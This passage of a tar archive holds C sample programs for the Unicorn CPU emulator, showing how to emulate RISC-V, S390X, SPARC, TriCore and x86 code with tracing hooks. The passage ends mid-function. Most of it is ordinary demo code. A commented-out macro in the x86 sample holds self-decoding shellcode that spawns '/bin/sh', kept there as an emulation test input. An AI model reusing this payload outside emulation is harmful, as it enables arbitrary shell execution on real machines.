uint64_t algined_address = address & 0xFFFFFFFFFFFFF000ULL; int aligned_size = ((int)(size / 0x1000) + 1) * 0x1000; printf(">>> Allocating block at 0x%" PRIx64 " (0x%" PRIx64 "), block size = 0x%x (0x%x)\n", address, algined_address, size, aligned_size); uc_mem_map(uc, algined_address, aligned_size, UC_PROT_ALL); // this recovers from missing memory, so we return true return true; } static void test_recover_from_illegal(void) { uc_engine *uc; uc_hook trace1, trace2, mem_alloc; uc_err err; uint64_t a0 = 0x1234; uint64_t a1 = 0x7890; printf("Emulate RISCV code: recover_from_illegal\n"); // Initialize emulator in RISCV64 mode err = uc_open(UC_ARCH_RISCV, UC_MODE_RISCV64, &uc); if (err) { printf("Failed on uc_open() with error returned: %u\n", err); return; } uc_reg_write(uc, UC_RISCV_REG_A0, &a0); uc_reg_write(uc, UC_RISCV_REG_A1, &a1); // map 2MB memory for this emulation uc_mem_map(uc, ADDRESS, 2 * 1024 * 1024, UC_PROT_ALL); // auto-allocate memory on access uc_hook_add(uc, &mem_alloc, UC_HOOK_MEM_UNMAPPED, hook_memalloc, NULL, 1, 0); // tracing all basic blocks with customized callback uc_hook_add(uc, &trace1, UC_HOOK_BLOCK, hook_block, NULL, 1, 0); // tracing all instruction uc_hook_add(uc, &trace2, UC_HOOK_CODE, hook_code, NULL, 1, 0); // write machine code to be emulated to memory uc_mem_write(uc, ADDRESS, RISCV_CODE, sizeof(RISCV_CODE) - 1); // emulate 1 instruction, wrong address, illegal code err = uc_emu_start(uc, 0x1000, -1, 0, 1); if (err != UC_ERR_INSN_INVALID) { printf("Expected Illegal Instruction error, got: %u\n", err); } // emulate 1 instruction, correct address, valid code err = uc_emu_start(uc, ADDRESS, -1, 0, 1); if (err) { printf("Failed on uc_emu_start() with error returned: %u\n", err); } // now print out some registers printf(">>> Emulation done. Below is the CPU context\n"); uc_reg_read(uc, UC_RISCV_REG_A0, &a0); uc_reg_read(uc, UC_RISCV_REG_A1, &a1); printf(">>> A0 = 0x%" PRIx64 "\n", a0); printf(">>> A1 = 0x%" PRIx64 "\n", a1); uc_close(uc); } static void test_riscv_func_return(void) { uc_engine *uc; uc_hook trace1, trace2; uc_err err; uint64_t pc = 0, ra = 0; // 10000: 00008067 ret // 10004: 8082 c.ret // 10006: 0001 nop // 10008: 0001 nop #define CODE "\x67\x80\x00\x00\x82\x80\x01\x00\x01\x00" printf("Emulate RISCV code: return from func\n"); // Initialize emulator in RISCV64 mode err = uc_open(UC_ARCH_RISCV, UC_MODE_RISCV64, &uc); if (err) { printf("Failed on uc_open() with error returned: %u (%s)\n", err, uc_strerror(err)); return; } // map 2MB memory for this emulation uc_mem_map(uc, ADDRESS, 2 * 1024 * 1024, UC_PROT_ALL); // write machine code to be emulated to memory uc_mem_write(uc, ADDRESS, CODE, sizeof(CODE) - 1); // tracing all basic blocks with customized callback uc_hook_add(uc, &trace1, UC_HOOK_BLOCK, hook_block, NULL, 1, 0); // tracing all instruction uc_hook_add(uc, &trace2, UC_HOOK_CODE, hook_code, NULL, 1, 0); #if 1 // set return address register // RET instruction will return to address in RA // so after RET, PC == RA ra = 0x10006; uc_reg_write(uc, UC_RISCV_REG_RA, &ra); // execute ret instruction err = uc_emu_start(uc, 0x10000, -1, 0, 1); if (err) { printf("Failed on uc_emu_start() with error returned: %u\n", err); } uc_reg_read(uc, UC_RISCV_REG_PC, &pc); if (pc != ra) { printf("Error after execution: PC is: 0x%" PRIx64 ", expected was 0x%" PRIx64 "\n", pc, ra); if (pc == 0x10000) { printf(" PC did not change during execution\n"); } } else { printf("Good, PC == RA\n"); } #endif // set return address register // C.RET instruction will return to address in RA // so after C.RET, PC == RA ra = 0x10006; uc_reg_write(uc, UC_RISCV_REG_RA, &ra); printf("========\n"); // execute c.ret instruction err = uc_emu_start(uc, 0x10004, -1, 0, 1); if (err) { printf("Failed on uc_emu_start() with error returned: %u\n", err); } uc_reg_read(uc, UC_RISCV_REG_PC, &pc); if (pc != ra) { printf("Error after execution: PC is: 0x%" PRIx64 ", expected was 0x%" PRIx64 "\n", pc, ra); if (pc == 0x10004) { printf(" PC did not change during execution\n"); } } else { printf("Good, PC == RA\n"); } // now print out some registers printf(">>> Emulation done.\n"); uc_close(uc); } int main(int argc, char **argv, char **envp) { test_recover_from_illegal(); printf("------------------\n"); test_riscv(); printf("------------------\n"); test_riscv2(); printf("------------------\n"); test_riscv3(); printf("------------------\n"); test_riscv_step(); printf("------------------\n"); test_riscv_timeout(); printf("------------------\n"); test_riscv_sd64(); printf("------------------\n"); test_riscv_func_return(); return 0; } ������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/samples/sample_s390x.c����������������������������������������������������������������0000664�0000000�0000000�00000004556�14675241067�0017255�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* Unicorn Emulator Engine */ /* By Nguyen Anh Quynh, 2021 */ /* Sample code to demonstrate how to emulate S390X code */ #include <unicorn/unicorn.h> #include <string.h> // code to be emulated #define S390X_CODE "\x18\x23" // lr %r2, %r3 // memory address where emulation starts #define ADDRESS 0x10000 static void hook_block(uc_engine *uc, uint64_t address, uint32_t size, void *user_data) { printf(">>> Tracing basic block at 0x%" PRIx64 ", block size = 0x%x\n", address, size); } static void hook_code(uc_engine *uc, uint64_t address, uint32_t size, void *user_data) { printf(">>> Tracing instruction at 0x%" PRIx64 ", instruction size = 0x%x\n", address, size); } static void test_s390x(void) { uc_engine *uc; uc_hook trace1, trace2; uc_err err; uint64_t r2 = 2, r3 = 3; printf("Emulate S390X code\n"); // Initialize emulator in S390X mode err = uc_open(UC_ARCH_S390X, UC_MODE_BIG_ENDIAN, &uc); if (err) { printf("Failed on uc_open() with error returned: %u (%s)\n", err, uc_strerror(err)); return; } // map 1MB memory for this emulation uc_mem_map(uc, ADDRESS, 1024 * 1024, UC_PROT_ALL); // write machine code to be emulated to memory uc_mem_write(uc, ADDRESS, S390X_CODE, sizeof(S390X_CODE) - 1); // initialize machine registers uc_reg_write(uc, UC_S390X_REG_R2, &r2); uc_reg_write(uc, UC_S390X_REG_R3, &r3); // tracing all basic blocks with customized callback uc_hook_add(uc, &trace1, UC_HOOK_BLOCK, hook_block, NULL, 1, 0); // tracing all instruction uc_hook_add(uc, &trace2, UC_HOOK_CODE, hook_code, NULL, 1, 0); // emulate machine code in infinite time (last param = 0), or when // finishing all the code. err = uc_emu_start(uc, ADDRESS, ADDRESS + sizeof(S390X_CODE) - 1, 0, 0); if (err) { printf("Failed on uc_emu_start() with error returned: %u (%s)\n", err, uc_strerror(err)); } // now print out some registers printf(">>> Emulation done. Below is the CPU context\n"); uc_reg_read(uc, UC_S390X_REG_R2, &r2); uc_reg_read(uc, UC_S390X_REG_R3, &r3); printf(">>> R2 = 0x%" PRIx64 "\t\t>>> R3 = 0x%" PRIx64 "\n", r2, r3); uc_close(uc); } int main(int argc, char **argv, char **envp) { test_s390x(); return 0; } ��������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/samples/sample_sparc.c����������������������������������������������������������������0000664�0000000�0000000�00000005016�14675241067�0017467�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* Unicorn Emulator Engine */ /* By Nguyen Anh Quynh, 2015 */ /* Sample code to demonstrate how to emulate Sparc code */ #include <unicorn/unicorn.h> #include <string.h> // code to be emulated #define SPARC_CODE "\x86\x00\x40\x02" // add %g1, %g2, %g3; // #define SPARC_CODE "\xbb\x70\x00\x00" // illegal code // memory address where emulation starts #define ADDRESS 0x10000 static void hook_block(uc_engine *uc, uint64_t address, uint32_t size, void *user_data) { printf(">>> Tracing basic block at 0x%" PRIx64 ", block size = 0x%x\n", address, size); } static void hook_code(uc_engine *uc, uint64_t address, uint32_t size, void *user_data) { printf(">>> Tracing instruction at 0x%" PRIx64 ", instruction size = 0x%x\n", address, size); } static void test_sparc(void) { uc_engine *uc; uc_err err; uc_hook trace1, trace2; int g1 = 0x1230; // G1 register int g2 = 0x6789; // G2 register int g3 = 0x5555; // G3 register printf("Emulate SPARC code\n"); // Initialize emulator in Sparc mode err = uc_open(UC_ARCH_SPARC, UC_MODE_SPARC32 | UC_MODE_BIG_ENDIAN, &uc); if (err) { printf("Failed on uc_open() with error returned: %u (%s)\n", err, uc_strerror(err)); return; } // map 2MB memory for this emulation uc_mem_map(uc, ADDRESS, 2 * 1024 * 1024, UC_PROT_ALL); // write machine code to be emulated to memory uc_mem_write(uc, ADDRESS, SPARC_CODE, sizeof(SPARC_CODE) - 1); // initialize machine registers uc_reg_write(uc, UC_SPARC_REG_G1, &g1); uc_reg_write(uc, UC_SPARC_REG_G2, &g2); uc_reg_write(uc, UC_SPARC_REG_G3, &g3); // tracing all basic blocks with customized callback uc_hook_add(uc, &trace1, UC_HOOK_BLOCK, hook_block, NULL, 1, 0); // tracing all instructions with customized callback uc_hook_add(uc, &trace2, UC_HOOK_CODE, hook_code, NULL, 1, 0); // emulate machine code in infinite time (last param = 0), or when // finishing all the code. err = uc_emu_start(uc, ADDRESS, ADDRESS + sizeof(SPARC_CODE) - 1, 0, 0); if (err) { printf("Failed on uc_emu_start() with error returned: %u (%s)\n", err, uc_strerror(err)); } // now print out some registers printf(">>> Emulation done. Below is the CPU context\n"); uc_reg_read(uc, UC_SPARC_REG_G3, &g3); printf(">>> G3 = 0x%x\n", g3); uc_close(uc); } int main(int argc, char **argv, char **envp) { test_sparc(); return 0; } ������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/samples/sample_tricore.c��������������������������������������������������������������0000664�0000000�0000000�00000004625�14675241067�0020033�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* Created for Unicorn Engine by Eric Poole <eric.poole@aptiv.com>, 2022 Copyright 2022 Aptiv */ /* Sample code to demonstrate how to emulate TriCore code */ #include <unicorn/unicorn.h> #include <string.h> // code to be emulated #define CODE "\x82\x11\xbb\x00\x00\x08" // mov d1, #0x1; mov.u d0, #0x8000 // memory address where emulation starts #define ADDRESS 0x10000 static void hook_block(uc_engine *uc, uint64_t address, uint32_t size, void *user_data) { printf(">>> Tracing basic block at 0x%" PRIx64 ", block size = 0x%x\n", address, size); } static void hook_code(uc_engine *uc, uint64_t address, uint32_t size, void *user_data) { printf(">>> Tracing instruction at 0x%" PRIx64 ", instruction size = 0x%x\n", address, size); } static void test_tricore(void) { uc_engine *uc; uc_err err; uc_hook trace1, trace2; uint32_t d0 = 0x0; // d0 register uint32_t d1 = 0x0; // d1 register printf("Emulate TriCore code\n"); // Initialize emulator in TriCore mode err = uc_open(UC_ARCH_TRICORE, UC_MODE_LITTLE_ENDIAN, &uc); if (err) { printf("Failed on uc_open() with error returned: %u (%s)\n", err, uc_strerror(err)); return; } // map 2MB memory for this emulation uc_mem_map(uc, ADDRESS, 2 * 1024 * 1024, UC_PROT_ALL); // write machine code to be emulated to memory uc_mem_write(uc, ADDRESS, CODE, sizeof(CODE) - 1); // tracing all basic blocks with customized callback uc_hook_add(uc, &trace1, UC_HOOK_BLOCK, hook_block, NULL, 1, 0); // tracing one instruction at ADDRESS with customized callback uc_hook_add(uc, &trace2, UC_HOOK_CODE, hook_code, NULL, ADDRESS, ADDRESS + sizeof(CODE) - 1); // emulate machine code in infinite time (last param = 0), or when // finishing all the code. err = uc_emu_start(uc, ADDRESS, ADDRESS + sizeof(CODE) - 1, 0, 0); if (err) { printf("Failed on uc_emu_start() with error returned: %u\n", err); } // now print out some registers printf(">>> Emulation done. Below is the CPU context\n"); uc_reg_read(uc, UC_TRICORE_REG_D0, &d0); printf(">>> d0 = 0x%x\n", d0); uc_reg_read(uc, UC_TRICORE_REG_D1, &d1); printf(">>> d1 = 0x%x\n", d1); uc_close(uc); } int main(int argc, char **argv, char **envp) { test_tricore(); return 0; } �����������������������������������������������������������������������������������������������������������unicorn-2.1.1/samples/sample_x86.c������������������������������������������������������������������0000664�0000000�0000000�00000136271�14675241067�0017014�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* Unicorn Emulator Engine */ /* By Nguyen Anh Quynh & Dang Hoang Vu, 2015 */ /* Sample code to demonstrate how to emulate X86 code */ #include <unicorn/unicorn.h> #include <string.h> // code to be emulated #define X86_CODE32 \ "\x41\x4a\x66\x0f\xef\xc1" // INC ecx; DEC edx; PXOR xmm0, xmm1 #define X86_CODE32_JUMP \ "\xeb\x02\x90\x90\x90\x90\x90\x90" // jmp 4; nop; nop; nop; nop; nop; nop // #define X86_CODE32_SELF // "\xeb\x1c\x5a\x89\xd6\x8b\x02\x66\x3d\xca\x7d\x75\x06\x66\x05\x03\x03\x89\x02\xfe\xc2\x3d\x41\x41\x41\x41\x75\xe9\xff\xe6\xe8\xdf\xff\xff\xff\x31\xd2\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xca\x7d\x41\x41\x41\x41" // #define X86_CODE32 "\x51\x51\x51\x51" // PUSH ecx; #define X86_CODE32_LOOP "\x41\x4a\xeb\xfe" // INC ecx; DEC edx; JMP self-loop #define X86_CODE32_MEM_WRITE \ "\x89\x0D\xAA\xAA\xAA\xAA\x41\x4a" // mov [0xaaaaaaaa], ecx; INC ecx; DEC // edx #define X86_CODE32_MEM_READ \ "\x8B\x0D\xAA\xAA\xAA\xAA\x41\x4a" // mov ecx,[0xaaaaaaaa]; INC ecx; DEC edx #define X86_CODE32_MEM_READ_IN_TB \ "\x40\x8b\x1d\x00\x00\x10\x00\x42" // inc eax; mov ebx, [0x100000]; inc edx #define X86_CODE32_JMP_INVALID \ "\xe9\xe9\xee\xee\xee\x41\x4a" // JMP outside; INC ecx; DEC edx #define X86_CODE32_INOUT \ "\x41\xE4\x3F\x4a\xE6\x46\x43" // INC ecx; IN AL, 0x3f; DEC edx; OUT 0x46, // AL; INC ebx #define X86_CODE32_INC "\x40" // INC eax // #define X86_CODE64 "\x41\xBC\x3B\xB0\x28\x2A \x49\x0F\xC9 \x90 //\x4D\x0F\xAD\xCF\x49\x87\xFD\x90\x48\x81\xD2\x8A\xCE\x77\x35\x48\xF7\xD9" // //<== still crash #define X86_CODE64 //"\x41\xBC\x3B\xB0\x28\x2A\x49\x0F\xC9\x90\x4D\x0F\xAD\xCF\x49\x87\xFD\x90\x48\x81\xD2\x8A\xCE\x77\x35\x48\xF7\xD9" #define X86_CODE64 \ "\x41\xBC\x3B\xB0\x28\x2A\x49\x0F\xC9\x90\x4D\x0F\xAD\xCF\x49\x87\xFD\x90" \ "\x48\x81\xD2\x8A\xCE\x77\x35\x48\xF7\xD9\x4D\x29\xF4\x49\x81\xC9\xF6\x8A" \ "\xC6\x53\x4D\x87\xED\x48\x0F\xAD\xD2\x49\xF7\xD4\x48\xF7\xE1\x4D\x19\xC5" \ "\x4D\x89\xC5\x48\xF7\xD6\x41\xB8\x4F\x8D\x6B\x59\x4D\x87\xD0\x68\x6A\x1E" \ "\x09\x3C\x59" #define X86_CODE16 "\x00\x00" // add byte ptr [bx + si], al #define X86_CODE64_SYSCALL "\x0f\x05" // SYSCALL #define X86_MMIO_CODE \ "\x89\x0d\x04\x00\x02\x00\x8b\x0d\x04\x00\x02\x00" // mov [0x20004], ecx; // mov ecx, [0x20004] /* * 0x1000 xor dword ptr [edi+0x3], eax ; edi=0x1000, eax=0xbc4177e6 * 0x1003 dw 0x3ea98b13 */ #define X86_CODE32_SMC "\x31\x47\x03\x13\x8b\xa9\x3e" // memory address where emulation starts #define ADDRESS 0x1000000 // callback for tracing basic blocks static void hook_block(uc_engine *uc, uint64_t address, uint32_t size, void *user_data) { printf(">>> Tracing basic block at 0x%" PRIx64 ", block size = 0x%x\n", address, size); } // callback for tracing instruction static void hook_code(uc_engine *uc, uint64_t address, uint32_t size, void *user_data) { int eflags; printf(">>> Tracing instruction at 0x%" PRIx64 ", instruction size = 0x%x\n", address, size); uc_reg_read(uc, UC_X86_REG_EFLAGS, &eflags); printf(">>> --- EFLAGS is 0x%x\n", eflags); // Uncomment below code to stop the emulation using uc_emu_stop() // if (address == 0x1000009) // uc_emu_stop(uc); } // callback for tracing instruction static void hook_code64(uc_engine *uc, uint64_t address, uint32_t size, void *user_data) { uint64_t rip; uc_reg_read(uc, UC_X86_REG_RIP, &rip); printf(">>> Tracing instruction at 0x%" PRIx64 ", instruction size = 0x%x\n", address, size); printf(">>> RIP is 0x%" PRIx64 "\n", rip); // Uncomment below code to stop the emulation using uc_emu_stop() // if (address == 0x1000009) // uc_emu_stop(uc); } // callback for tracing memory access (READ or WRITE) static bool hook_mem_invalid(uc_engine *uc, uc_mem_type type, uint64_t address, int size, int64_t value, void *user_data) { switch (type) { default: // return false to indicate we want to stop emulation return false; case UC_MEM_WRITE_UNMAPPED: printf(">>> Missing memory is being WRITE at 0x%" PRIx64 ", data size = %u, data value = 0x%" PRIx64 "\n", address, size, value); // map this memory in with 2MB in size uc_mem_map(uc, 0xaaaa0000, 2 * 1024 * 1024, UC_PROT_ALL); // return true to indicate we want to continue return true; } } // dummy callback static bool hook_mem_invalid_dummy(uc_engine *uc, uc_mem_type type, uint64_t address, int size, int64_t value, void *user_data) { // stop emulation return false; } static void hook_mem64(uc_engine *uc, uc_mem_type type, uint64_t address, int size, int64_t value, void *user_data) { switch (type) { default: break; case UC_MEM_READ: printf(">>> Memory is being READ at 0x%" PRIx64 ", data size = %u\n", address, size); break; case UC_MEM_WRITE: printf(">>> Memory is being WRITE at 0x%" PRIx64 ", data size = %u, data value = 0x%" PRIx64 "\n", address, size, value); break; } } // callback for IN instruction (X86). // this returns the data read from the port static uint32_t hook_in(uc_engine *uc, uint32_t port, int size, void *user_data) { uint32_t eip; uc_reg_read(uc, UC_X86_REG_EIP, &eip); printf("--- reading from port 0x%x, size: %u, address: 0x%x\n", port, size, eip); switch (size) { default: return 0; // should never reach this case 1: // read 1 byte to AL return 0xf1; case 2: // read 2 byte to AX return 0xf2; break; case 4: // read 4 byte to EAX return 0xf4; } } // callback for OUT instruction (X86). static void hook_out(uc_engine *uc, uint32_t port, int size, uint32_t value, void *user_data) { uint32_t tmp = 0; uint32_t eip; uc_reg_read(uc, UC_X86_REG_EIP, &eip); printf("--- writing to port 0x%x, size: %u, value: 0x%x, address: 0x%x\n", port, size, value, eip); // confirm that value is indeed the value of AL/AX/EAX switch (size) { default: return; // should never reach this case 1: uc_reg_read(uc, UC_X86_REG_AL, &tmp); break; case 2: uc_reg_read(uc, UC_X86_REG_AX, &tmp); break; case 4: uc_reg_read(uc, UC_X86_REG_EAX, &tmp); break; } printf("--- register value = 0x%x\n", tmp); } // callback for SYSCALL instruction (X86). static void hook_syscall(uc_engine *uc, void *user_data) { uint64_t rax; uc_reg_read(uc, UC_X86_REG_RAX, &rax); if (rax == 0x100) { rax = 0x200; uc_reg_write(uc, UC_X86_REG_RAX, &rax); } else printf("ERROR: was not expecting rax=0x%" PRIx64 " in syscall\n", rax); } static bool hook_memalloc(uc_engine *uc, uc_mem_type type, uint64_t address, int size, int64_t value, void *user_data) { uint64_t algined_address = address & 0xFFFFFFFFFFFFF000ULL; int aligned_size = ((int)(size / 0x1000) + 1) * 0x1000; printf(">>> Allocating block at 0x%" PRIx64 " (0x%" PRIx64 "), block size = 0x%x (0x%x)\n", address, algined_address, size, aligned_size); uc_mem_map(uc, algined_address, aligned_size, UC_PROT_ALL); // write machine code to be emulated to memory if (uc_mem_write(uc, algined_address, X86_CODE32, sizeof(X86_CODE32) - 1)) { printf("Failed to write emulation code to memory, quit!\n"); return false; } // this recovers from missing memory, so we return true return true; } static void test_miss_code(void) { uc_engine *uc; uc_err err; uc_hook trace1, trace2; int r_ecx = 0x1234; // ECX register int r_edx = 0x7890; // EDX register printf("Emulate i386 code - missing code\n"); // Initialize emulator in X86-32bit mode err = uc_open(UC_ARCH_X86, UC_MODE_32, &uc); if (err) { printf("Failed on uc_open() with error returned: %u\n", err); return; } // initialize machine registers uc_reg_write(uc, UC_X86_REG_ECX, &r_ecx); uc_reg_write(uc, UC_X86_REG_EDX, &r_edx); // tracing all instruction by having @begin > @end uc_hook_add(uc, &trace1, UC_HOOK_CODE, hook_code, NULL, 1, 0); // auto-allocate memory on access uc_hook_add(uc, &trace2, UC_HOOK_MEM_UNMAPPED, hook_memalloc, NULL, 1, 0); // emulate machine code, without having the code in yet err = uc_emu_start(uc, ADDRESS, ADDRESS + sizeof(X86_CODE32) - 1, 0, 0); if (err) { printf("Failed on uc_emu_start() with error returned %u: %s\n", err, uc_strerror(err)); } // now print out some registers printf(">>> Emulation done. Below is the CPU context\n"); uc_reg_read(uc, UC_X86_REG_ECX, &r_ecx); uc_reg_read(uc, UC_X86_REG_EDX, &r_edx); printf(">>> ECX = 0x%x\n", r_ecx); printf(">>> EDX = 0x%x\n", r_edx); uc_close(uc); } static void test_i386(void) { uc_engine *uc; uc_err err; uint32_t tmp; uc_hook trace1, trace2; int r_ecx = 0x1234; // ECX register int r_edx = 0x7890; // EDX register // XMM0 and XMM1 registers, low qword then high qword uint64_t r_xmm0[2] = {0x08090a0b0c0d0e0f, 0x0001020304050607}; uint64_t r_xmm1[2] = {0x8090a0b0c0d0e0f0, 0x0010203040506070}; printf("Emulate i386 code\n"); // Initialize emulator in X86-32bit mode err = uc_open(UC_ARCH_X86, UC_MODE_32, &uc); if (err) { printf("Failed on uc_open() with error returned: %u\n", err); return; } // map 2MB memory for this emulation uc_mem_map(uc, ADDRESS, 2 * 1024 * 1024, UC_PROT_ALL); // write machine code to be emulated to memory if (uc_mem_write(uc, ADDRESS, X86_CODE32, sizeof(X86_CODE32) - 1)) { printf("Failed to write emulation code to memory, quit!\n"); return; } // initialize machine registers uc_reg_write(uc, UC_X86_REG_ECX, &r_ecx); uc_reg_write(uc, UC_X86_REG_EDX, &r_edx); uc_reg_write(uc, UC_X86_REG_XMM0, &r_xmm0); uc_reg_write(uc, UC_X86_REG_XMM1, &r_xmm1); // tracing all basic blocks with customized callback uc_hook_add(uc, &trace1, UC_HOOK_BLOCK, hook_block, NULL, 1, 0); // tracing all instruction by having @begin > @end uc_hook_add(uc, &trace2, UC_HOOK_CODE, hook_code, NULL, 1, 0); // emulate machine code in infinite time err = uc_emu_start(uc, ADDRESS, ADDRESS + sizeof(X86_CODE32) - 1, 0, 0); if (err) { printf("Failed on uc_emu_start() with error returned %u: %s\n", err, uc_strerror(err)); } // now print out some registers printf(">>> Emulation done. Below is the CPU context\n"); uc_reg_read(uc, UC_X86_REG_ECX, &r_ecx); uc_reg_read(uc, UC_X86_REG_EDX, &r_edx); uc_reg_read(uc, UC_X86_REG_XMM0, &r_xmm0); printf(">>> ECX = 0x%x\n", r_ecx); printf(">>> EDX = 0x%x\n", r_edx); printf(">>> XMM0 = 0x%.16" PRIx64 "%.16" PRIx64 "\n", r_xmm0[1], r_xmm0[0]); // read from memory if (!uc_mem_read(uc, ADDRESS, &tmp, sizeof(tmp))) printf(">>> Read 4 bytes from [0x%x] = 0x%x\n", ADDRESS, tmp); else printf(">>> Failed to read 4 bytes from [0x%x]\n", ADDRESS); uc_close(uc); } static void test_i386_map_ptr(void) { uc_engine *uc; uc_err err; uint32_t tmp; uc_hook trace1, trace2; void *mem; int r_ecx = 0x1234; // ECX register int r_edx = 0x7890; // EDX register printf("Emulate i386 code - use uc_mem_map_ptr()\n"); // Initialize emulator in X86-32bit mode err = uc_open(UC_ARCH_X86, UC_MODE_32, &uc); if (err) { printf("Failed on uc_open() with error returned: %u\n", err); return; } // malloc 2MB memory for this emulation mem = calloc(1, 2 * 1024 * 1024); if (mem == NULL) { printf("Failed to malloc()\n"); return; } uc_mem_map_ptr(uc, ADDRESS, 2 * 1024 * 1024, UC_PROT_ALL, mem); // write machine code to be emulated to memory if (!memcpy(mem, X86_CODE32, sizeof(X86_CODE32) - 1)) { printf("Failed to write emulation code to memory, quit!\n"); return; } // initialize machine registers uc_reg_write(uc, UC_X86_REG_ECX, &r_ecx); uc_reg_write(uc, UC_X86_REG_EDX, &r_edx); // tracing all basic blocks with customized callback uc_hook_add(uc, &trace1, UC_HOOK_BLOCK, hook_block, NULL, 1, 0); // tracing all instruction by having @begin > @end uc_hook_add(uc, &trace2, UC_HOOK_CODE, hook_code, NULL, 1, 0); // emulate machine code in infinite time err = uc_emu_start(uc, ADDRESS, ADDRESS + sizeof(X86_CODE32) - 1, 0, 0); if (err) { printf("Failed on uc_emu_start() with error returned %u: %s\n", err, uc_strerror(err)); } // now print out some registers printf(">>> Emulation done. Below is the CPU context\n"); uc_reg_read(uc, UC_X86_REG_ECX, &r_ecx); uc_reg_read(uc, UC_X86_REG_EDX, &r_edx); printf(">>> ECX = 0x%x\n", r_ecx); printf(">>> EDX = 0x%x\n", r_edx); // read from memory if (!uc_mem_read(uc, ADDRESS, &tmp, sizeof(tmp))) printf(">>> Read 4 bytes from [0x%x] = 0x%x\n", ADDRESS, tmp); else printf(">>> Failed to read 4 bytes from [0x%x]\n", ADDRESS); uc_close(uc); free(mem); } static void test_i386_jump(void) { uc_engine *uc; uc_err err; uc_hook trace1, trace2; printf("Emulate i386 code with jump\n"); // Initialize emulator in X86-32bit mode err = uc_open(UC_ARCH_X86, UC_MODE_32, &uc); if (err) { printf("Failed on uc_open() with error returned: %u\n", err); return; } // map 2MB memory for this emulation uc_mem_map(uc, ADDRESS, 2 * 1024 * 1024, UC_PROT_ALL); // write machine code to be emulated to memory if (uc_mem_write(uc, ADDRESS, X86_CODE32_JUMP, sizeof(X86_CODE32_JUMP) - 1)) { printf("Failed to write emulation code to memory, quit!\n"); return; } // tracing 1 basic block with customized callback uc_hook_add(uc, &trace1, UC_HOOK_BLOCK, hook_block, NULL, ADDRESS, ADDRESS); // tracing 1 instruction at ADDRESS uc_hook_add(uc, &trace2, UC_HOOK_CODE, hook_code, NULL, ADDRESS, ADDRESS); // emulate machine code in infinite time err = uc_emu_start(uc, ADDRESS, ADDRESS + sizeof(X86_CODE32_JUMP) - 1, 0, 0); if (err) { printf("Failed on uc_emu_start() with error returned %u: %s\n", err, uc_strerror(err)); } printf(">>> Emulation done. Below is the CPU context\n"); uc_close(uc); } // emulate code that loop forever static void test_i386_loop(void) { uc_engine *uc; uc_err err; int r_ecx = 0x1234; // ECX register int r_edx = 0x7890; // EDX register printf("Emulate i386 code that loop forever\n"); // Initialize emulator in X86-32bit mode err = uc_open(UC_ARCH_X86, UC_MODE_32, &uc); if (err) { printf("Failed on uc_open() with error returned: %u\n", err); return; } // map 2MB memory for this emulation uc_mem_map(uc, ADDRESS, 2 * 1024 * 1024, UC_PROT_ALL); // write machine code to be emulated to memory if (uc_mem_write(uc, ADDRESS, X86_CODE32_LOOP, sizeof(X86_CODE32_LOOP) - 1)) { printf("Failed to write emulation code to memory, quit!\n"); return; } // initialize machine registers uc_reg_write(uc, UC_X86_REG_ECX, &r_ecx); uc_reg_write(uc, UC_X86_REG_EDX, &r_edx); // emulate machine code in 2 seconds, so we can quit even // if the code loops err = uc_emu_start(uc, ADDRESS, ADDRESS + sizeof(X86_CODE32_LOOP) - 1, 2 * UC_SECOND_SCALE, 0); if (err) { printf("Failed on uc_emu_start() with error returned %u: %s\n", err, uc_strerror(err)); } // now print out some registers printf(">>> Emulation done. Below is the CPU context\n"); uc_reg_read(uc, UC_X86_REG_ECX, &r_ecx); uc_reg_read(uc, UC_X86_REG_EDX, &r_edx); printf(">>> ECX = 0x%x\n", r_ecx); printf(">>> EDX = 0x%x\n", r_edx); uc_close(uc); } // emulate code that read invalid memory static void test_i386_invalid_mem_read(void) { uc_engine *uc; uc_err err; uc_hook trace1, trace2; int r_ecx = 0x1234; // ECX register int r_edx = 0x7890; // EDX register printf("Emulate i386 code that read from invalid memory\n"); // Initialize emulator in X86-32bit mode err = uc_open(UC_ARCH_X86, UC_MODE_32, &uc); if (err) { printf("Failed on uc_open() with error returned: %u\n", err); return; } // map 2MB memory for this emulation uc_mem_map(uc, ADDRESS, 2 * 1024 * 1024, UC_PROT_ALL); // write machine code to be emulated to memory if (uc_mem_write(uc, ADDRESS, X86_CODE32_MEM_READ, sizeof(X86_CODE32_MEM_READ) - 1)) { printf("Failed to write emulation code to memory, quit!\n"); return; } // initialize machine registers uc_reg_write(uc, UC_X86_REG_ECX, &r_ecx); uc_reg_write(uc, UC_X86_REG_EDX, &r_edx); // tracing all basic blocks with customized callback uc_hook_add(uc, &trace1, UC_HOOK_BLOCK, hook_block, NULL, 1, 0); // tracing all instruction by having @begin > @end uc_hook_add(uc, &trace2, UC_HOOK_CODE, hook_code, NULL, 1, 0); // emulate machine code in infinite time err = uc_emu_start(uc, ADDRESS, ADDRESS + sizeof(X86_CODE32_MEM_READ) - 1, 0, 0); if (err) { printf("Failed on uc_emu_start() with error returned %u: %s\n", err, uc_strerror(err)); } // now print out some registers printf(">>> Emulation done. Below is the CPU context\n"); uc_reg_read(uc, UC_X86_REG_ECX, &r_ecx); uc_reg_read(uc, UC_X86_REG_EDX, &r_edx); printf(">>> ECX = 0x%x\n", r_ecx); printf(">>> EDX = 0x%x\n", r_edx); uc_close(uc); } // emulate code that write invalid memory static void test_i386_invalid_mem_write(void) { uc_engine *uc; uc_err err; uc_hook trace1, trace2, trace3; uint32_t tmp; int r_ecx = 0x1234; // ECX register int r_edx = 0x7890; // EDX register 